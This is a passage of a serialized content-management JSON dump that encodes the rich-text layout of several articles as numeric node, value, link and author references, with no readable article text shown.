detection.",{"items":236638},[236639,236641],{"sys":236640,"name":509},{"id":508},{"sys":236642,"name":505},{"id":504},{"items":236644},[236645,237009,237735],{"__typename":1528,"sys":236646,"content":236647,"title":202530,"synopsis":202531,"hashTags":118,"publishedDate":202532,"slug":202533,"tagsCollection":236999,"authorsCollection":237005},{"id":114387},{"json":236648},{"nodeType":165,"data":236649,"content":236650},{},[236651,236656,236673,236690,236705,236722,236743,236749,236766,236783,236789,236794,236800,236806,236812,236818,236824,236830,236836,236842,236848,236865,236871,236876,236896,236902,236917,236922,236939,236945,236951,236957,236963,236978,236984],{"nodeType":312,"data":236652,"content":236655},{"target":236653},{"sys":236654},{"id":202136,"type":317,"linkType":318},[],{"nodeType":178,"data":236657,"content":236658},{},[236659,236662,236670],{"nodeType":173,"value":202142,"marks":236660,"data":236661},[],{},{"nodeType":1698,"data":236663,"content":236666},{"target":236664},{"sys":236665},{"id":202149,"type":317,"linkType":318},[236667],{"nodeType":173,"value":202152,"marks":236668,"data":236669},[],{},{"nodeType":173,"value":202156,"marks":236671,"data":236672},[],{},{"nodeType":178,"data":236674,"content":236675},{},[236676,236679,236687],{"nodeType":173,"value":202163,"marks":236677,"data":236678},[],{},{"nodeType":1698,"data":236680,"content":236683},{"target":236681},{"sys":236682},{"id":202170,"type":317,"linkType":318},[236684],{"nodeType":173,"value":202173,"marks":236685,"data":236686},[],{},{"nodeType":173,"value":202177,"marks":236688,"data":236689},[],{},{"nodeType":178,"data":236691,"content":236692},{},[236693,236696,236702],{"nodeType":173,"value":202184,"marks":236694,"data":236695},[],{},{"nodeType":186,"data":236697,"content":236698},{"uri":183364},[236699],{"nodeType":173,"value":202191,"marks":236700,"data":236701},[],{},{"nodeType":173,"value":202195,"marks":236703,"data":236704},[],{},{"nodeType":178,"data":236706,"content":236707},{},[236708,236711,236719],{"nodeType":173,"value":202202,"marks":236709,"data":236710},[],{},{"nodeType":1698,"data":236712,"content":236715},{"target":236713},{"sys":236714},{"id":202149,"type":317,"linkType":318},[236716],{"nodeType":173,"value":202211,"marks":236717,"data":236718},[],{},{"nodeType":173,"value":202215,"marks":236720,"data":236721},[],{},{"nodeType":250,"data":236723,"content":236724},{},[236725,236734],{"nodeType":254,"data":236726,"content":236727},{},[236728],{"nodeType":178,"data":236729,"content":236730},{},[236731],{"nodeType":173,"value":202228,"marks":236732,"data":236733},[],{},{"nodeType":254,"data":236735,"content":236736},{},[236737],{"nodeType":178,"data":236738,"content":236739},{},[236740],{"nodeType":173,"value":202238,"marks":236741,"data":236742},[],{},{"nodeType":178,"data":236744,"content":236745},{},[236746],{"nodeType":173,"value":202245,"marks":236747,"data":236748},[],{},{"nodeType":178,"data":236750,"content":236751},{},[236752,236755,236763],{"nodeType":173,"value":202252,"marks":236753,"data":236754},[],{},{"nodeType":1698,"data":236756,"content":236759},{"target":236757},{"sys":236758},{"id":2148,"type":317,"linkType":318},[236760],{"nodeType":173,"value":202261,"marks":236761,"data":236762},[],{},{"nodeType":173,"value":202265,"marks":236764,"data":236765},[],{},{"nodeType":178,"data":236767,"content":236768},{},[236769,236772,236780],{"nodeType":173,"value":202272,"marks":236770,"data":236771},[],{},{"nodeType":1698,"data":236773,"content":236776},{"target":236774},{"sys":236775},{"id":189461,"type":317,"linkType":318},[236777],{"nodeType":173,"value":202281,"marks":236778,"data":236779},[],{},{"nodeType":173,"value":202285,"marks":236781,"data":236782},[],{},{"nodeType":178,"data":236784,"content":236785},{},[236786],{"nodeType":173,"value":202292,"marks":236787,"data":236788},[],{},{"nodeType":312,"data":236790,"content":236793},{"target":236791},{"sys":236792},{"id":202299,"type":317,"linkType":318},[],{"nodeType":169,"data":236795,"content":236796},{},[236797],{"nodeType":173,"value":202305,"marks":236798,"data":236799},[],{},{"nodeType":178,"data":236801,"content":236802},{},[236803],{"nodeType":173,"value":202312,"marks":236804,"data":236805},[],{},{"nodeType":178,"data":236807,"content":236808},{},[236809],{"nodeType":173,"value":202319,"marks":236810,"data":236811},[],{},{"nodeType":178,"data":236813,"content":236814},{},[236815],{"nodeType":173,"value":202326,"marks":236816,"data":236817},[],{},{"nodeType":178,"data":236819,"content":236820},{},[236821],{"nodeType":173,"value":202333,"marks":236822,"data":236823},[],{},{"nodeType":178,"data":236825,"content":236826},{},[236827],{"nodeType":173,"value":202340,"marks":236828,"data":236829},[],{},{"nodeType":178,"data":236831,"content":236832},{},[236833],{"nodeType":173,"value":202347,"marks":236834,"data":236835},[],{},{"nodeType":169,"data":236837,"content":236838},{},[236839],{"nodeType":173,"value":189115,"marks":236840,"data":236841},[],{},{"nodeType":178,"data":236843,"content":236844},{},[236845],{"nodeType":173,"value":202360,"marks":236846,"data":236847},[],{},{"nodeType":178,"data":236849,"content":236850},{},[236851,236854,236862],{"nodeType":173,"value":202367,"marks":236852,"data":236853},[],{},{"nodeType":1698,"data":236855,"content":236858},{"target":236856},{"sys":236857},{"id":183439,"type":317,"linkType":318},[236859],{"nodeType":173,"value":155418,"marks":236860,"data":236861},[],{},{"nodeType":173,"value":202379,"marks":236863,"data":236864},[],{},{"nodeType":178,"data":236866,"content":236867},{},[236868],{"nodeType":173,"value":202386,"marks":236869,"data":236870},[],{},{"nodeType":312,"data":236872,"content":236875},{"target":236873},{"sys":236874},{"id":189099,"type":317,"linkType":318},[],{"nodeType":178,"data":236877,"content":236878},{},[236879,236882,236886,236889,236893],{"nodeType":173,"value":180786,"marks":236880,"data":236881},[],{},{"nodeType":173,"value":2748,"marks":236883,"data":236885},[236884],{"type":370},{},{"nodeType":173,"value":202405,"marks":236887,"data":236888},[],{},{"nodeType":173,"value":2740,"marks":236890,"data":236892},[236891],{"type":370},{},{"nodeType":173,"value":202413,"marks":236894,"data":236895},[],{},{"nodeType":178,"data":236897,"content":236898},{},[236899],{"nodeType":173,"value":202420,"marks":236900,"data":236901},[],{},{"nodeType":178,"data":236903,"content":236904},{},[236905,236908,236914],{"nodeType":173,"value":196274,"marks":236906,"data":236907},[],{},{"nodeType":186,"data":236909,"content":236910},{"uri":183466},[236911],{"nodeType":173,"value":155030,"marks":236912,"data":236913},[],{},{"nodeType":173,"value":196284,"marks":236915,"data":236916},[],{},{"nodeType":312,"data":236918,"content":236921},{"target":236919},{"sys":236920},{"id":202442,"type":317,"linkType":318},[],{"nodeType":178,"data":236923,"content":236924},{},[236925,236928,236936],{"nodeType":173,"value":202448,"marks":236926,"data":236927},[],{},{"nodeType":1698,"data":236929,"content":236932},{"target":236930},{"sys":236931},{"id":2405,"type":317,"linkType":318},[236933],{"nodeType":173,"value":125683,"marks":236934,"data":236935},[],{},{"nodeType":173,"value":202460,"marks":236937,"data":236938},[],{},{"nodeType":178,"data":236940,"content":236941},{},[236942],{"nodeType":173,"value":202467,"marks":236943,"data":236944},[],{},{"nodeType":178,"data":236946,"content":236947},{},[236948],{"nodeType":173,"value":202474,"marks":236949,"data":236950},[],{},{"nodeType":169,"data":236952,"content":236953},{},[236954],{"nodeType":173,"value":117844,"marks":236955,"data":236956},[],{},{"nodeType":178,"data":236958,"content":236959},{},[236960],{"nodeType":173,"value":202487,"marks":236961,"data":236962},[],{},{"nodeType":178,"data":236964,"content":236965},{},[236966,236969,236975],{"nodeType":173,"value":202494,"marks":236967,"data":236968},[],{},{"nodeType":186,"data":236970,"content":236971},{"uri":202499},[236972],{"nodeType":173,"value":202502,"marks":236973,"data":236974},[],{},{"nodeType":173,"value":1477,"marks":236976,"data":236977},[],{},{"nodeType":169,"data":236979,"content":236980},{},[236981],{"nodeType":173,"value":71801,"marks":236982,"data":236983},[],{},{"nodeType":178,"data":236985,"content":236986},{},[236987,236990,236996],{"nodeType":173,"value":114452,"marks":236988,"data":236989},[],{},{"nodeType":186,"data":236991,"content":236992},{"uri":473},[236993],{"nodeType":173,"value":88194,"marks":236994,"data":236995},[],{},{"nodeType":173,"value":202527,"marks":236997,"data":236998},[],{},{"items":237000},[237001,237003],{"sys":237002,"name":18399},{"id":18398},{"sys":237004,"name":509},{"id":508},{"items":237006},[237007],{"fullName":2908,"firstName":2909,"jobTitle":514,"profilePicture":237008},{"url":2911},{"__typename":1528,"sys":237010,"content":237011,"title":140020,"synopsis":230548,"hashTags":118,"publishedDate":230549,"slug":230550,"tagsCollection":237725,"authorsCollection":237731},{"id":202149},{"json":237012},{"nodeType":165,"data":237013,"content":237014},{},[237015,237021,237027,237033,237039,237045,237051,237057,237063,237069,237074,237080,237086,237092,237138,237144,237150,237166,237172,237178,237184,237210,237223,237229,237235,237241,237247,237253,237259,237275,237291,237389,237395,237411,237417,237423,237429,237434,237440,237446,237452,237478,237484,237490,237520,237526,237532,237614,237629,237635,237641,237647,237653,237699,237705,237708,237714,237719],{"nodeType":178,"data":237016,"content":237017},{},[237018],{"nodeType":173,"value":229742,"marks":237019,"data":237020},[],{},{"nodeType":178,"data":237022,"content":237023},{},[237024],{"nodeType":173,"value":229749,"marks":237025,"data":237026},[],{},{"nodeType":178,"data":237028,"content":237029},{},[237030],{"nodeType":173,"value":229756,"marks":237031,"data":237032},[],{},{"nodeType":169,"data":237034,"content":237035},{},[237036],{"nodeType":173,"value":229763,"marks":237037,"data":237038},[],{},{"nodeType":178,"data":237040,"content":237041},{},[237042],{"nodeType":173,"value":229770,"marks":237043,"data":237044},[],{},{"nodeType":178,"data":237046,"content":237047},{},[237048],{"nodeType":173,"value":229777,"marks":237049,"data":237050},[],{},{"nodeType":178,"data":237052,"content":237053},{},[237054],{"nodeType":173,"value":229784,"marks":237055,"data":237056},[],{},{"nodeType":178,"data":237058,"content":237059},{},[237060],{"nodeType":173,"value":229791,"marks":237061,"data":237062},[],{},{"nodeType":178,"data":237064,"content":237065},{},[237066],{"nodeType":173,"value":229798,"marks":237067,"data":237068},[],{},{"nodeType":312,"data":237070,"content":237073},{"target":237071},{"sys":237072},{"id":229805,"type":317,"linkType":318},[],{"nodeType":235,"data":237075,"content":237076},{},[237077],{"nodeType":173,"value":229811,"marks":237078,"data":237079},[],{},{"nodeType":178,"data":237081,"content":237082},{},[237083],{"nodeType":173,"value":229818,"marks":237084,"data":237085},[],{},{"nodeType":178,"data":237087,"content":237088},{},[237089],{"nodeType":173,"value":229825,"marks":237090,"data":237091},[],{},{"nodeType":178,"data":237093,"content":237094},{},[237095,237098,237105,237108,237115,237118,237125,237128,237135],{"nodeType":173,"value":229832,"marks":237096,"data":237097},[],{},{"nodeType":186,"data":237099,"content":237100},{"uri":196192},[237101],{"nodeType":173,"value":196195,"marks":237102,"data":237104},[237103],{"type":194},{},{"nodeType":173,"value":2936,"marks":237106,"data":237107},[],{},{"nodeType":186,"data":237109,"content":237110},{"uri":196203},[237111],{"nodeType":173,"value":196206,"marks":237112,"data":237114},[237113],{"type":194},{},{"nodeType":173,"value":229853,"marks":237116,"data":237117},[],{},{"nodeType":186,"data":237119,"content":237120},{"uri":181618},[237121],{"nodeType":173,"value":181621,"marks":237122,"data":237124},[237123],{"type":194},{},{"nodeType":173,"value":229864,"marks":237126,"data":237127},[],{},{"nodeType":186,"data":237129,"content":237130},{"uri":196223},[237131],{"nodeType":173,"value":196226,"marks":237132,"data":237134},[237133],{"type":194},{},{"nodeType":173,"value":1477,"marks":237136,"data":237137},[],{},{"nodeType":178,"data":237139,"content":237140},{},[237141],{"nodeType":173,"value":229881,"marks":237142,"data":237143},[],{},{"nodeType":178,"data":237145,"content":237146},{},[237147],{"nodeType":173,"value":229888,"marks":237148,"data":237149},[],{},{"nodeType":178,"data":237151,"content":237152},{},[237153,237156,237163],{"nodeType":173,"value":229895,"marks":237154,"data":237155},[],{},{"nodeType":186,"data":237157,"content":237158},{"uri":229900},[237159],{"nodeType":173,"value":229903,"marks":237160,"data":237162},[237161],{"type":194},{},{"nodeType":173,"value":481,"marks":237164,"data":237165},[],{},{"nodeType":235,"data":237167,"content":237168},{},[237169],{"nodeType":173,"value":229914,"marks":237170,"data":237171},[],{},{"nodeType":178,"data":237173,"content":237174},{},[237175],{"nodeType":173,"value":229921,"marks":237176,"data":237177},[],{},{"nodeType":178,"data":237179,"content":237180},{},[237181],{"nodeType":173,"value":229928,"marks":237182,"data":237183},[],{},{"nodeType":178,"data":237185,"content":237186},{},[237187,237190,237197,237200,237207],{"nodeType":173,"value":229935,"marks":237188,"data":237189},[],{},{"nodeType":186,"data":237191,"content":237192},{"uri":180509},[237193],{"nodeType":173,"value":229942,"marks":237194,"data":237196},[237195],{"type":194},{},{"nodeType":173,"value":229947,"marks":237198,"data":237199},[],{},{"nodeType":186,"data":237201,"content":237202},{"uri":229952},[237203],{"nodeType":173,"value":229955,"marks":237204,"data":237206},[237205],{"type":194},{},{"nodeType":173,"value":229960,"marks":237208,"data":237209},[],{},{"nodeType":178,"data":237211,"content":237212},{},[237213,237216,237220],{"nodeType":173,"value":229967,"marks":237214,"data":237215},[],{},{"nodeType":173,"value":229971,"marks":237217,"data":237219},[237218],{"type":370},{},{"nodeType":173,"value":229976,"marks":237221,"data":237222},[],{},{"nodeType":178,"data":237224,"content":237225},{},[237226],{"nodeType":173,"value":229983,"marks":237227,"data":237228},[],{},{"nodeType":178,"data":237230,"content":237231},{},[237232],{"nodeType":173,"value":229990,"marks":237233,"data":237234},[],{},{"nodeType":169,"data":237236,"content":237237},{},[237238],{"nodeType":173,"value":229997,"marks":237239,"data":237240},[],{},{"nodeType":178,"data":237242,"content":237243},{},[237244],{"nodeType":173,"value":230004,"marks":237245,"data":237246},[],{},{"nodeType":178,"data":237248,"content":237249},{},[237250],{"nodeType":173,"value":230011,"marks":237251,"data":237252},[],{},{"nodeType":178,"data":237254,"content":237255},{},[237256],{"nodeType":173,"value":230018,"marks":237257,"data":237258},[],{},{"nodeType":178,"data":237260,"content":237261},{},[237262,237265,237272],{"nodeType":173,"value":230025,"marks":237263,"data":237264},[],{},{"nodeType":186,"data":237266,"content":237267},{"uri":230030},[237268],{"nodeType":173,"value":230033,"marks":237269,"data":237271},[237270],{"type":194},{},{"nodeType":173,"value":230038,"marks":237273,"data":237274},[],{},{"nodeType":178,"data":237276,"content":237277},{},[237278,237281,237288],{"nodeType":173,"value":230045,"marks":237279,"data":237280},[],{},{"nodeType":186,"data":237282,"content":237283},{"uri":88239},[237284],{"nodeType":173,"value":88245,"marks":237285,"data":237287},[237286],{"type":194},{},{"nodeType":173,"value":230056,"marks":237289,"data":237290},[],{},{"nodeType":250,"data":237292,"content":237293},{},[237294,237313,237332,237351,237370],{"nodeType":254,"data":237295,"content":237296},{},[237297],{"nodeType":178,"data":237298,"content":237299},{},[237300,237303,237310],{"nodeType":173,"value":37,"marks":237301,"data":237302},[],{},{"nodeType":186,"data":237304,"content":237305},{"uri":59347},[237306],{"nodeType":173,"value":230075,"marks":237307,"data":237309},[237308],{"type":194},{},{"nodeType":173,"value":37,"marks":237311,"data":237312},[],{},{"nodeType":254,"data":237314,"content":237315},{},[237316],{"nodeType":178,"data":237317,"content":237318},{},[237319,237322,237329],{"nodeType":173,"value":37,"marks":237320,"data":237321},[],{},{"nodeType":186,"data":237323,"content":237324},{"uri":230093},[237325],{"nodeType":173,"value":230096,"marks":237326,"data":237328},[237327],{"type":194},{},{"nodeType":173,"value":37,"marks":237330,"data":237331},[],{},{"nodeType":254,"data":237333,"content":237334},{},[237335],{"nodeType":178,"data":237336,"content":237337},{},[237338,237341,237348],{"nodeType":173,"value":37,"marks":237339,"data":237340},[],{},{"nodeType":186,"data":237342,"content":237343},{"uri":832},[237344],{"nodeType":173,"value":230116,"marks":237345,"data":237347},[237346],{"type":194},{},{"nodeType":173,"value":37,"marks":237349,"data":237350},[],{},{"nodeType":254,"data":237352,"content":237353},{},[237354],{"nodeType":178,"data":237355,"content":237356},{},[237357,237360,237367],{"nodeType":173,"value":37,"marks":237358,"data":237359},[],{},{"nodeType":186,"data":237361,"content":237362},{"uri":197688},[237363],{"nodeType":173,"value":230136,"marks":237364,"data":237366},[237365],{"type":194},{},{"nodeType":173,"value":37,"marks":237368,"data":237369},[],{},{"nodeType":254,"data":237371,"content":237372},{},[237373],{"nodeType":178,"data":237374,"content":237375},{},[237376,237379,237386],{"nodeType":173,"value":37,"marks":237377,"data":237378},[],{},{"nodeType":186,"data":237380,"content":237381},{"uri":144083},[237382],{"nodeType":173,"value":230156,"marks":237383,"data":237385},[237384],{"type":194},{},{"nodeType":173,"value":37,"marks":237387,"data":237388},[],{},{"nodeType":178,"data":237390,"content":237391},{},[237392],{"nodeType":173,"value":230167,"marks":237393,"data":237394},[],{},{"nodeType":178,"data":237396,"content":237397},{},[237398,237401,237408],{"nodeType":173,"value":230174,"marks":237399,"data":237400},[],{},{"nodeType":186,"data":237402,"content":237403},{"uri":63250},[237404],{"nodeType":173,"value":63256,"marks":237405,"data":237407},[237406],{"type":194},{},{"nodeType":173,"value":230185,"marks":237409,"data":237410},[],{},{"nodeType":169,"data":237412,"content":237413},{},[237414],{"nodeType":173,"value":230192,"marks":237415,"data":237416},[],{},{"nodeType":178,"data":237418,"content":237419},{},[237420],{"nodeType":173,"value":230199,"marks":237421,"data":237422},[],{},{"nodeType":178,"data":237424,"content":237425},{},[237426],{"nodeType":173,"value":230206,"marks":237427,"data":237428},[],{},{"nodeType":312,"data":237430,"content":237433},{"target":237431},{"sys":237432},{"id":230213,"type":317,"linkType":318},[],{"nodeType":178,"data":237435,"content":237436},{},[237437],{"nodeType":173,"value":230219,"marks":237438,"data":237439},[],{},{"nodeType":169,"data":237441,"content":237442},{},[237443],{"nodeType":173,"value":230226,"marks":237444,"data":237445},[],{},{"nodeType":178,"data":237447,"content":237448},{},[237449],{"nodeType":173,"value":230233,"marks":237450,"data":237451},[],{},{"nodeType":178,"data":237453,"content":237454},{},[237455,237458,237468,237471,237475],{"nodeType":173,"value":230240,"marks":237456,"data":237457},[],{},{"nodeType":186,"data":237459,"content":237460},{"uri":183364},[237461,237465],{"nodeType":173,"value":230247,"marks":237462,"data":237464},[237463],{"type":194},{},{"nodeType":173,"value":1260,"marks":237466,"data":237467},[],{},{"nodeType":173,"value":230255,"marks":237469,"data":237470},[],{},{"nodeType":173,"value":230259,"marks":237472,"data":237474},[237473],{"type":370},{},{"nodeType":173,"value":230264,"marks":237476,"data":237477},[],{},{"nodeType":169,"data":237479,"content":237480},{},[237481],{"nodeType":173,"value":143524,"marks":237482,"data":237483},[],{},{"nodeType":178,"data":237485,"content":237486},{},[237487],{"nodeType":173,"value":230277,"marks":237488,"data":237489},[],{},{"nodeType":250,"data":237491,"content":237492},{},[237493,237502,237511],{"nodeType":254,"data":237494,"content":237495},{},[237496],{"nodeType":178,"data":237497,"content":237498},{},[237499],{"nodeType":173,"value":230290,"marks":237500,"data":237501},[],{},{"nodeType":254,"data":237503,"content":237504},{},[237505],{"nodeType":178,"data":237506,"content":237507},{},[237508],{"nodeType":173,"value":230300,"marks":237509,"data":237510},[],{},{"nodeType":254,"data":237512,"content":237513},{},[237514],{"nodeType":178,"data":237515,"content":237516},{},[237517],{"nodeType":173,"value":230310,"marks":237518,"data":237519},[],{},{"nodeType":169,"data":237521,"content":237522},{},[237523],{"nodeType":173,"value":230317,"marks":237524,"data":237525},[],{},{"nodeType":178,"data":237527,"content":237528},{},[237529],{"nodeType":173,"value":230324,"marks":237530,"data":237531},[],{},{"nodeType":250,"data":237533,"content":237534},{},[237535,237548,237578,237601],{"nodeType":254,"data":237536,"content":237537},{},[237538],{"nodeType":178,"data":237539,"content":237540},{},[237541,237545],{"nodeType":173,"value":230337,"marks":237542,"data":237544},[237543],{"type":370},{},{"nodeType":173,"value":230342,"marks":237546,"data":237547},[],{},{"nodeType":254,"data":237549,"content":237550},{},[237551],{"nodeType":178,"data":237552,"content":237553},{},[237554,237558,237561,237565,237568,237575],{"nodeType":173,"value":230352,"marks":237555,"data":237557},[237556],{"type":370},{},{"nodeType":173,"value":3107,"marks":237559,"data":237560},[],{},{"nodeType":173,"value":230360,"marks":237562,"data":237564},[237563],{"type":370},{},{"nodeType":173,"value":230365,"marks":237566,"data":237567},[],{},{"nodeType":186,"data":237569,"content":237570},{"uri":230370},[237571],{"nodeType":173,"value":230373,"marks":237572,"data":237574},[237573],{"type":194},{},{"nodeType":173,"value":37,"marks":237576,"data":237577},[],{},{"nodeType":254,"data":237579,"content":237580},{},[237581],{"nodeType":178,"data":237582,"content":237583},{},[237584,237588,237591,237598],{"nodeType":173,"value":230387,"marks":237585,"data":237587},[237586],{"type":370},{},{"nodeType":173,"value":230392,"marks":237589,"data":237590},[],{},{"nodeType":186,"data":237592,"content":237593},{"uri":230397},[237594],{"nodeType":173,"value":230400,"marks":237595,"data":237597},[237596],{"type":194},{},{"nodeType":173,"value":230405,"marks":237599,"data":237600},[],{},{"nodeType":254,"data":237602,"content":237603},{},[237604],{"nodeType":178,"data":237605,"content":237606},{},[237607,237611],{"nodeType":173,"value":230415,"marks":237608,"data":237610},[237609],{"type":370},{},{"nodeType":173,"value":230420,"marks":237612,"data":237613},[],{},{"nodeType":178,"data":237615,"content":237616},{},[237617,237620,237626],{"nodeType":173,"value":230427,"marks":237618,"data":237619},[],{},{"nodeType":186,"data":237621,"content":237622},{"uri":75048},[237623],{"nodeType":173,"value":230434,"marks":237624,"data":237625},[],{},{"nodeType":173,"value":2340,"marks":237627,"data":237628},[],{},{"nodeType":169,"data":237630,"content":237631},{},[237632],{"nodeType":173,"value":40632,"marks":237633,"data":237634},[],{},{"nodeType":178,"data":237636,"content":237637},{},[237638],{"nodeType":173,"value":230450,"marks":237639,"data":237640},[],{},{"nodeType":178,"data":237642,"content":237643},{},[237644],{"nodeType":173,"value":230457,"marks":237645,"data":237646},[],{},{"nodeType":178,"data":237648,"content":237649},{},[237650],{"nodeType":173,"value":230464,"marks":237651,"data":237652},[],{},{"nodeType":178,"data":237654,"content":237655},{},[237656,237659,237666,237669,237676,237679,237686,237689,237696],{"nodeType":173,"value":230471,"marks":237657,"data":237658},[],{},{"nodeType":186,"data":237660,"content":237661},{"uri":181526},[237662],{"nodeType":173,"value":226380,"marks":237663,"data":237665},[237664],{"type":194},{},{"nodeType":173,"value":1464,"marks":237667,"data":237668},[],{},{"nodeType":186,"data":237670,"content":237671},{"uri":181538},[237672],{"nodeType":173,"value":230488,"marks":237673,"data":237675},[237674],{"type":194},{},{"nodeType":173,"value":230493,"marks":237677,"data":237678},[],{},{"nodeType":186,"data":237680,"content":237681},{"uri":70029},[237682],{"nodeType":173,"value":230500,"marks":237683,"data":237685},[237684],{"type":194},{},{"nodeType":173,"value":230505,"marks":237687,"data":237688},[],{},{"nodeType":186,"data":237690,"content":237691},{"uri":162243},[237692],{"nodeType":173,"value":230512,"marks":237693,"data":237695},[237694],{"type":194},{},{"nodeType":173,"value":230517,"marks":237697,"data":237698},[],{},{"nodeType":178,"data":237700,"content":237701},{},[237702],{"nodeType":173,"value":230524,"marks":237703,"data":237704},[],{},{"nodeType":231,"data":237706,"content":237707},{},[],{"nodeType":178,"data":237709,"content":237710},{},[237711],{"nodeType":173,"value":230534,"marks":237712,"data":237713},[],{},{"nodeType":312,"data":237715,"content":237718},{"target":237716},{"sys":237717},{"id":229805,"type":317,"linkType":318},[],{"nodeType":178,"data":237720,"content":237721},{},[237722],{"nodeType":173,"value":37,"marks":237723,"data":237724},[],{},{"items":237726},[237727,237729],{"sys":237728,"name":505},{"id":504},{"sys":237730,"name":509},{"id":508},{"items":237732},[237733],{"fullName":8611,"firstName":8612,"jobTitle":8613,"profilePicture":237734},{"url":8615},{"__typename":1528,"sys":237736,"content":237737,"title":209117,"synopsis":209118,"hashTags":118,"publishedDate":209119,"slug":209120,"tagsCollection":238400,"authorsCollection":238406},{"id":208338},{"json":237738},{"nodeType":165,"data":237739,"content":237740},{},[237741,237747,237753,237759,237765,237771,237777,237782,237798,237804,237840,237846,237852,237888,237904,237910,237916,237922,237938,237954,237960,237990,237996,238012,238018,238024,238050,238066,238072,238077,238083,238089,238095,238101,238107,238113,238119,238125,238131,238137,238143,238149,238162,238168,238224,238230,238236,238259,238272,238278,238284,238290,238316,238333,238339,238345,238351,238357,238373,238389,238394],{"nodeType":178,"data":237742,"content":237743},{},[237744],{"nodeType":173,"value":208347,"marks":237745,"data":237746},[],{},{"nodeType":178,"data":237748,"content":237749},{},[237750],{"nodeType":173,"value":208354,"marks":237751,"data":237752},[],{},{"nodeType":178,"data":237754,"content":237755},{},[237756],{"nodeType":173,"value":208361,"marks":237757,"data":237758},[],{},{"nodeType":178,"data":237760,"content":237761},{},[237762],{"nodeType":173,"value":208368,"marks":237763,"data":237764},[],{},{"nodeType":169,"data":237766,"content":237767},{},[237768],{"nodeType":173,"value":208375,"marks":237769,"data":237770},[],{},{"nodeType":178,"data":237772,"content":237773},{},[237774],{"nodeType":173,"value":208382,"marks":237775,"data":237776},[],{},{"nodeType":312,"data":237778,"content":237781},{"target":237779},{"sys":237780},{"id":208389,"type":317,"linkType":318},[],{"nodeType":178,"data":237783,"content":237784},{},[237785,237788,237795],{"nodeType":173,"value":208395,"marks":237786,"data":237787},[],{},{"nodeType":186,"data":237789,"content":237790},{"uri":88239},[237791],{"nodeType":173,"value":197982,"marks":237792,"data":237794},[237793],{"type":194},{},{"nodeType":173,"value":1477,"marks":237796,"data":237797},[],{},{"nodeType":178,"data":237799,"content":237800},{},[237801],{"nodeType":173,"value":208412,"marks":237802,"data":237803},[],{},{"nodeType":178,"data":237805,"content":237806},{},[237807,237810,237817,237820,237827,237830,237837],{"nodeType":173,"value":208419,"marks":237808,"data":237809},[],{},{"nodeType":186,"data":237811,"content":237812},{"uri":106815},[237813],{"nodeType":173,"value":208426,"marks":237814,"data":237816},[237815],{"type":194},{},{"nodeType":173,"value":933,"marks":237818,"data":237819},[],{},{"nodeType":186,"data":237821,"content":237822},{"uri":208435},[237823],{"nodeType":173,"value":208438,"marks":237824,"data":237826},[237825],{"type":194},{},{"nodeType":173,"value":208443,"marks":237828,"data":237829},[],{},{"nodeType":186,"data":237831,"content":237832},{"uri":162296},[237833],{"nodeType":173,"value":208450,"marks":237834,"data":237836},[237835],{"type":194},{},{"nodeType":173,"value":208455,"marks":237838,"data":237839},[],{},{"nodeType":178,"data":237841,"content":237842},{},[237843],{"nodeType":173,"value":208462,"marks":237844,"data":237845},[],{},{"nodeType":235,"data":237847,"content":237848},{},[237849],{"nodeType":173,"value":208469,"marks":237850,"data":237851},[],{},{"nodeType":178,"data":237853,"content":237854},{},[237855,237858,237865,237868,237875,237878,237885],{"nodeType":173,"value":208476,"marks":237856,"data":237857},[],{},{"nodeType":186,"data":237859,"content":237860},{"uri":184680},[237861],{"nodeType":173,"value":182807,"marks":237862,"data":237864},[237863],{"type":194},{},{"nodeType":173,"value":933,"marks":237866,"data":237867},[],{},{"nodeType":186,"data":237869,"content":237870},{"uri":197109},[237871],{"nodeType":173,"value":197114,"marks":237872,"data":237874},[237873],{"type":194},{},{"nodeType":173,"value":208497,"marks":237876,"data":237877},[],{},{"nodeType":186,"data":237879,"content":237880},{"uri":197770},[237881],{"nodeType":173,"value":208504,"marks":237882,"data":237884},[237883],{"type":194},{},{"nodeType":173,"value":208509,"marks":237886,"data":237887},[],{},{"nodeType":178,"data":237889,"content":237890},{},[237891,237894,237901],{"nodeType":173,"value":208516,"marks":237892,"data":237893},[],{},{"nodeType":186,"data":237895,"content":237896},{"uri":208521},[237897],{"nodeType":173,"value":208524,"marks":237898,"data":237900},[237899],{"type":194},{},{"nodeType":173,"value":208529,"marks":237902,"data":237903},[],{},{"nodeType":178,"data":237905,"content":237906},{},[237907],{"nodeType":173,"value":208536,"marks":237908,"data":237909},[],{},{"nodeType":178,"data":237911,"content":237912},{},[237913],{"nodeType":173,"value":208543,"marks":237914,"data":237915},[],{},{"nodeType":235,"data":237917,"content":237918},{},[237919],{"nodeType":173,"value":208550,"marks":237920,"data":237921},[],{},{"nodeType":178,"data":237923,"content":237924},{},[237925,237928,237935],{"nodeType":173,"value":208557,"marks":237926,"data":237927},[],{},{"nodeType":186,"data":237929,"content":237930},{"uri":208562},[237931],{"nodeType":173,"value":208565,"marks":237932,"data":237934},[237933],{"type":194},{},{"nodeType":173,"value":208570,"marks":237936,"data":237937},[],{},{"nodeType":178,"data":237939,"content":237940},{},[237941,237944,237951],{"nodeType":173,"value":208577,"marks":237942,"data":237943},[],{},{"nodeType":186,"data":237945,"content":237946},{"uri":144083},[237947],{"nodeType":173,"value":144086,"marks":237948,"data":237950},[237949],{"type":194},{},{"nodeType":173,"value":208588,"marks":237952,"data":237953},[],{},{"nodeType":178,"data":237955,"content":237956},{},[237957],{"nodeType":173,"value":208595,"marks":237958,"data":237959},[],{},{"nodeType":250,"data":237961,"content":237962},{},[237963,237972,237981],{"nodeType":254,"data":237964,"content":237965},{},[237966],{"nodeType":178,"data":237967,"content":237968},{},[237969],{"nodeType":173,"value":208608,"marks":237970,"data":237971},[],{},{"nodeType":254,"data":237973,"content":237974},{},[237975],{"nodeType":178,"data":237976,"content":237977},{},[237978],{"nodeType":173,"value":208618,"marks":237979,"data":237980},[],{},{"nodeType":254,"data":237982,"content":237983},{},[237984],{"nodeType":178,"data":237985,"content":237986},{},[237987],{"nodeType":173,"value":208628,"marks":237988,"data":237989},[],{},{"nodeType":178,"data":237991,"content":237992},{},[237993],{"nodeType":173,"value":208635,"marks":237994,"data":237995},[],{},{"nodeType":178,"data":237997,"content":237998},{},[237999,238002,238009],{"nodeType":173,"value":208642,"marks":238000,"data":238001},[],{},{"nodeType":186,"data":238003,"content":238004},{"uri":59335},[238005],{"nodeType":173,"value":208649,"marks":238006,"data":238008},[238007],{"type":194},{},{"nodeType":173,"value":208654,"marks":238010,"data":238011},[],{},{"nodeType":235,"data":238013,"content":238014},{},[238015],{"nodeType":173,"value":208661,"marks":238016,"data":238017},[],{},{"nodeType":178,"data":238019,"content":238020},{},[23